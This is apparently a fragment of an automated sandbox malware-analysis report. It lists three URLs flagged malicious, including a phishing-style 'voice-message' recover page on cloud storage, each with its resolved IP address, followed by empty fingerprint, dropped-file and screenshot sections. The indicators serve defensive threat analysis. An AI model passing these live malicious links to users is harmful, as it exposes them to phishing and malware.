      https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fimvvn.github.io%2fccim%2f&c=E,1,s2KfHZunLtZSb1cm0jOwj0_9Y-iDKF79zkIfC5Ze03RiFAdkz_AnMXM5Ad1mEyz21WkWPYCq2zDuuxsX_V37Z4zFS-WwsMzjMExo7LPy-wEnSQ,,&typo=1Get hashmaliciousBrowse
      • 185.199.111.153
      https://storage.googleapis.com/friday2019811/voice-message/voice-message/recover.html?#marketing@boundarysys.comGet hashmaliciousBrowse
      • 152.199.23.37
      http://click.clickanalytics208.com/s_code.js?cid=240&v=73a55f6de3dee2a751c3Get hashmaliciousBrowse
      • 81.4.122.101

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.